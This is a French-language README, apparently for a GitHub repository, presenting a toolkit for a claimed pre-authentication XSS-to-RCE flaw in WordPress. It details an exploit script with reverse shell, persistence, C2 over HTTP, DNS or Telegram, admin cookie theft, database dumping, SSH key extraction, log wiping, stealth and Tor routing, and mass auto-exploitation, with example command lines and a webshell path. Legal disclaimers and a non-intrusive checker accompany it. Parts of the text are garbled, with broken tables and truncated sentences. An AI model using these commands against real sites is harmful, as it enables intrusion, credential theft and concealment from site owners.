
🛡️ CVE-2026-64638 - Suite d'évaluation de sécurité WordPress (CVSS 8.9) | Boîte à outils de pentest WordPress 4.7.0-7.0.2. Comprend des modules d'évaluation des vulnérabilités et d'analyse avancée. 🐍 Vérification sûre et exploitation, 2 modes. Boîte à outils avancée Blue&Red Team Best 2026-64638, utilisation autorisée uniquement. Restez légal <3zd

⚠️ UTILISATION ÉTHIQUE UNIQUEMENT – TESTS DE SÉCURITÉ AUTORISÉS
Ce dépôt fournit des outils destinés uniquement aux professionnels de la sécurité autorisés, aux blue teams et aux testeurs d'intrusion.
L'accès non autorisé à des systèmes informatiques est illégal en vertu du CFAA (États-Unis), du Computer Misuse Act (Royaume-Uni), du TCK 243/244 (Turquie) et des lois similaires dans le monde entier.
CVE‑2026‑64638 est une vulnérabilité critique de type XSS réfléchie pré‑authentification dans le cœur de WordPress, versions 4.7.0 à 7.0.2, qui permet à un attaquant d'élever une attaque XSS en exécution de code à distance (RCE) complète via la fonctionnalité Application Password (mot de passe d'application).
strip_tags() de PHP et wp_kses_post() de WordPress analysent les balises HTML différemment, ce qui permet à une entrée malveillante de contourner l'assainissement.wp-login.php). En cas d'échec de connexion, la charge utile est réfléchie et exécutée dans le navigateur de la victime.| Outil | Objectif | Utilisateur visé |
|---|---|---|
exploit.py | Boîte à outils d'exploitation complète avec shell inversé, persistance, C2, élévation de privilèges, forensic mémoire, dump de base de données, extraction de clés SSH et scan de masse. |
git clone https://github.com/tc4dy/CVE-2026-64638-PoC-Exploit
cd CVE-2026-64638-PoC-Exploit
pip install -r requirements.txt
requests
urllib3
#ops
pymysql
mysql-connector-python
PySocks
requests[socks]
exploit.pysafecheck.py| Point d'accès | Objectif |
|---|---|
/wp-login.php | Page de connexion – point d'injection XSS |
Ce logiciel est fourni uniquement à des fins éducatives et pour des tests de sécurité autorisés.
| Red teams / pentesters autorisés |
safecheck.py | Vérificateur de vulnérabilité non intrusif qui détecte la réflexion XSS et évalue la posture de sécurité sans exécuter de charge utile malveillante. Génère des rapports détaillés. | Blue teams / auditeurs de sécurité |
| Fonctionnalité | exploit.py | safecheck.py |
|---|
| Détection de vulnérabilité | ✅ | ✅ |
| Détection de version WordPress | ✅ | ✅ |
| Détection de réflexion XSS | ✅ | ✅ |
| Capture d'Application Password | ✅ | ❌ |
| Téléversement de plugin (RCE) | ✅ | ❌ |
| Shell inversé | ✅ | ❌ |
| Balise C2 (HTTP/DNS/Telegram) | ✅ | ❌ |
| Élévation de privilèges | ✅ | ❌ |
| Forensic mémoire | ✅ | ❌ |
| Dump de base de données | ✅ | ❌ |
| Extraction de clés SSH | ✅ | ❌ |
| Méthodes de persistance | ✅ | ❌ |
| Audit des en-têtes de sécurité | ❌ | ✅ |
| Vérification d'exposition des fichiers de configuration | ❌ | ✅ |
| Vérification du listage des répertoires | ❌ | ✅ |
| Vérification d'exposition de phpinfo | ❌ | ✅ |
| Scan de masse | ✅ | ✅ |
| Prise en charge des proxys | ✅ | ✅ |
| Prise en charge de Tor | ✅ | ✅ |
| Tunnel Ngrok | ✅ | ❌ |
| Shell interactif | ✅ | ❌ |
| Mode non intrusif (sûr) | ❌ | ✅ |
| Sortie JSON / rapport | ✅ | ✅ |
| Scénario | Outil recommandé |
|---|
| Blue Team – vérifier si votre installation WordPress est vulnérable | safecheck.py |
| Audit de sécurité – évaluation de vulnérabilité non intrusive | safecheck.py |
| Red Team – tests d'intrusion autorisés avec exploitation complète | exploit.py |
| Bug Bounty – tests de divulgation responsable | safecheck.py |
| Scan de masse – vérification de plusieurs cibles pour une vulnérabilité | exploit.py ou safecheck.py |
| Réponse aux incidents – vérifier si des systèmes sont compromis | safecheck.py |
| Post‑exploitation avancée – persistance, C2, forensique | exploit.py |
| Paramètre | Description |
|---|
-t, --target | URL WordPress cible (par ex. https://wordpress-site.com) |
-l, --list | Fichier contenant une liste de cibles (une par ligne) pour le scan de masse |
--lhost | Adresse IP locale pour les rappels de shell inversé |
--lport | Port local pour le shell inversé (défaut : 4444) |
--proxy | Proxy HTTP/HTTPS (par ex. http://127.0.0.1:8080) |
--timeout | Délai d'expiration des requêtes en secondes (défaut : 10) |
--retry | Nombre de nouvelles tentatives (défaut : 3) |
--threads | Nombre de threads pour le scan de masse (défaut : 5) |
--exploit | Exploiter automatiquement les cibles vulnérables pendant le scan de masse |
--ngrok-token | Jeton d'authentification Ngrok pour le tunneling externe |
--payload-type | Type de charge utile XSS : reflected, dom_based, waf_bypass, case_manipulation, double_encoded |
--session-hijack | Activer le détournement de session (vol des cookies administrateur) |
--dump-db | Dumper la base de données WordPress (nécessite pymysql) |
--extract-ssh | Extraire les clés SSH du système cible |
--tor | Acheminer le trafic via Tor (socks5h://127.0.0.1:9050) |
--stealth | Activer le mode furtif (en-têtes falsifiés, requêtes retardées) |
--no-cleanup | Ignorer le nettoyage des journaux après l'exploitation |
--ssl-verify | Vérifier les certificats SSL |
--c2-type | Type de C2 : http, dns, telegram |
--c2-server | URL du serveur C2 ou jeton de bot Telegram |
--auto-priv-esc | Élévation de privilèges automatique après le shell |
--memory-forensics | Activer le module de forensic mémoire |
-v, --verbose | Sortie détaillée |
-q, --quiet | Mode silencieux (sortie minimale) |
| Paramètre | Description |
|---|
-t, --target | URL WordPress cible (par ex. https://wordpress-site.com) |
-l, --list | Fichier contenant une liste de cibles (une par ligne) pour le scan de masse |
--timeout | Délai d'expiration des requêtes en secondes (défaut : 10) |
--retry | Nombre de nouvelles tentatives (défaut : 3) |
--threads | Nombre de threads pour le scan de masse (défaut : 5) |
--proxy | Proxy HTTP/HTTPS (par ex. http://127.0.0.1:8080) |
--tor | Acheminer le trafic via Tor (socks5h://127.0.0.1:9050) |
--ssl-verify | Vérifier les certificats SSL |
--output | Fichier de rapport JSON de sortie |
-v, --verbose | Sortie détaillée |
-q, --quiet | Mode silencieux (sortie minimale) |
| # | Scénario | Commande |
|---|
| 1 | Vérification rapide de vulnérabilité | python safecheck.py -t https://wordpress-site.com |
| 2 | Scan détaillé avec rapport | python safecheck.py -t https://wordpress-site.com --output report.json -v |
| 3 | Exploitation complète avec shell inversé | python exploit.py -t https://wordpress-site.com --lhost 192.168.1.100 --exploit |
| 4 | Utiliser une charge utile XSS personnalisée | python exploit.py -t https://wordpress-site.com --payload-type waf_bypass |
| 5 | Détournement de session (vol des cookies administrateur) | python exploit.py -t https://wordpress-site.com --session-hijack |
| 6 | Dumper la base de données WordPress | python exploit.py -t https://wordpress-site.com --dump-db |
| 7 | Extraire les clés SSH | python exploit.py -t https://wordpress-site.com --extract-ssh |
| 8 | Utiliser Tor pour l'anonymat | python exploit.py -t https://wordpress-site.com --tor --stealth |
| 9 | Balise C2 avec Telegram | python exploit.py -t https://wordpress-site.com --c2-type telegram --c2-server "https://api.telegram.org/botTOKEN/chat_id" |
| 10 | Scan de masse à partir d'un fichier | python exploit.py -l targets.txt --threads 10 --exploit |
| 11 | Forensic mémoire après le shell | python exploit.py -t https://wordpress-site.com --memory-forensics |
| 12 | Élévation de privilèges automatique | python exploit.py -t https://wordpress-site.com --auto-priv-esc |
| 13 | Shell interactif | python exploit.py -t https://wordpress-site.com -i |
| 14 | Tunnel Ngrok | python exploit.py -t https://wordpress-site.com --ngrok-token YOUR_TOKEN |
| Commande | Description |
|---|
reverse | Démarrer l'écouteur de shell inversé |
persist | Appliquer les méthodes de persistance (cron, systemd, rc.local, SSH, WP) |
clean | Nettoyer les journaux système et l'historique |
dumpdb | Dumper la base de données WordPress |
ssh | Extraire les clés SSH |
priv | Élévation de privilèges automatique |
mem | Exécuter le forensic mémoire |
c2 | Afficher l'état du C2 |
c2task | Vérifier les tâches C2 |
exit | Quitter le shell interactif |
/wp-admin/authorize-application.php |
| Génération d'Application Password |
/wp-admin/update.php?action=upload-plugin | Téléversement de plugin (RCE) |
/wp-content/plugins/{slug}/{slug}.php | Exécution de la webshell |
| Pays | Loi applicable |
|---|
| États-Unis | Computer Fraud and Abuse Act (CFAA) – 18 U.S.C. § 1030 |
| Royaume-Uni | Computer Misuse Act 1990 |
| Turquie | TCK 243 (Accès non autorisé), TCK 244 (Interférence avec un système) |
| Allemagne | StGB § 202a (Espionnage de données), § 202b (Interception de données) |
| France | Loi Godfrain – Article 323-1 |
| Australie | Cybercrime Act 2001 |
| Canada | Code criminel – Article 342.1 |
| Inde | Information Technology Act 2000 – Articles 43, 66 |
| Japon | Act on Prohibition of Unauthorized Computer Access |